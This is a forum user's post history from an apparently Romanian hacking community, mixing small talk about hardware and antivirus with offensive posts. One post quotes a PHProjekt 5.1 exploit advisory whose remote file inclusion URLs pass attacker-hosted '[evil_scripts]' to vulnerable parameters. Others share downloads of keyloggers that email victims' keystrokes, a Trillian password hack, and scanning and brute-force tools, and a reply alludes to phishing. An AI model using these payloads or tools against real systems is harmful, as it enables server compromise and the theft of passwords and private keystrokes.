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Everything posted by Razor
As vrea si eu unul cu Razor si RST pe fundal verde si cu fontul din avataru lui edededi (ala unde scrie RST).
Very nice share man! Thanks alot
bune pt. colectie. Nice share
<div class='quotetop'>QUOTE("Nemessis")</div> Nu are legatura nici cu una nici cu cealalta. Suntem pescari. Iti spune ceva cuvantul asta? [/quote:e003f7c122] phishing mda. nice share
very nice 10x
/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -  - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: PHProjekt v. 5.1 - [Script site: [url]http://www.phprojekt.com/[/url] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -      Find by: Kacper (a.k.a Rahim) + -      Contact: [email]kacper1964@yahoo.pl[/email] -             or -      [url]http://www.devilteam.yum.pl[/url] + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Greetz: DragonHeart - and all DEVIL TEAM Members + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + -       Z Dedykacja dla osoby, -     bez ktorej nie mogl bym zyc... -      K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #Expl: [url]http://www.site.com/[/url][PHProjekt_path]/lib/dbman_filter.inc.php?lib_path=[evil_scripts] [url]http://www.site.com/[/url][PHProjekt_path]/lib/specialdays.php?path_pre=[evil_scripts] #Pozdro dla wszystkich;-) # milw0rm.com [2006-08-15]
O sa-l incerc si eu. 10x
<div class='quotetop'>QUOTE("AnON|m")</div> Mda... avand in vedere astea si altele cred ca e viu
http://rapidshare.de/files/29865581/Scanners.rar.html Scanners pack: THC-AMAP Amap is a next-generation scanning tool, which identifies applications and services even if they are not listening on the default port SuperScan SuperScan is a completely-rewritten update of the highly popular Windows port scanning, pinger, resolver tool, SuperScan Nmap 4.1.1 For win32 and linux Nessus For win32 and linux Winscan Wingate scanner AngryIPScan Fast port scanner Languard Port scanner and network scanner Port Spy Port listener
Folosesc NOD 32 dar si Kaspersky este bun doar ca mananca resurse. Compare your Antivirus to NOD32 http://www.eset.com/products/compare-NOD32...competition.php http://www.eset.com/products/compare.php
Daca nu aveti cont de e-mail de la isp si nu va merge incercati cu asta www.the-quickest.com
nice 10x alot
http://rapidshare.de/files/28625757/Trilian_pass_hack.txt.html L-am uploadat pt ca nu mergea pus direct.
Sorry! Link doesn't exists. Poate cineva sa reuplodeze. 10x
da e veche faza cu magnetu` da la astea electrice e problema
EIZO Flex Scan f563-t @17inch vechi da merge bine inca
<div class='quotetop'>QUOTE("avkhackteam")</div> Cred ca asta e rezultatul
Not workin` We have to change our webserver
Intel P4 @ 3ghz Prescott
Keyloggers are programs that records all keystrokes like paswords or anything written by keyboard. Most of them also e-mail the keystrokes. Includes latest versions of: Ardamax keylogger Golden keylogger Sc Keylogger Pro Quick keylogger Spy anytime Stealth keylogger Perfect keylogger Activity keylogger http://rapidshare.de/files/5012599/KEYLOGGERS_AIO_T_RK__EDITION.rar.html pass:T??rk??
Un tutorial aici http://rapidshare.de/files/28406746/AD_Tutorial.zip.html
AccessDiver is a security tester for WEB sites. It incorporates a set of powerful features which help you find and organize failures and weaknesses from your web site. Here is a quick list of the features available: Requirements A PC compatible machine Windows 9x,Me,2000,XP,2003 7 MB of space on your disk 192 MB of memory (RAM) Pentium 200 or higher Screen resolution : 800x600 Contains fast security that uses up to 100 bots to do its analysis. Detects directory failures by comparing hundreds of known problems to your site. AccessDiver is fully proxy compliant and has a proxy analyzer (speed / anonymity) and a proxy hunter built-in. A built-in word leecher helps you increase the size of your dictionaries to expand and reinforce your analysis. A powerful task automizer manages your jobs transparently. You can tackle unlrelated tasks while Accessdiver is working, saving you time. An on-the-fly word manipulator lets you increase the strength of your dictionaries easily when doing your analyzis. A PING tester is included to tell you the efficiency of your site and the efficiency of an Internet address you would like to access. A DNS resolver lets you look up the host name of an IP address and reverse the process to learn an unknown host name. A feature called 'HTTP debugger' helps your understanding of how actual HTTP protocol works. It opens up the process so you see what really happens during a connection problem. A WHOIS gadget lets you retrieve owner information of a domain name (in case you would like to buy the domain or contact the actual owner). An update notifier automatically tells you when a new version of AccessDiver is available. And I welcome you to discover the other extremely features by yourself... A leeching system allows you to collect new proxies to make better proxy lists n A proxy Hunting system allows you to get even more proxies by scanning IP regions... A file splitting and file merging system allows you to mixup files, or cut them in mutiple parts. That's good to handle wordlists or proxylists. http://rapidshare.de/files/28402771/ad4.260.installer.exe.html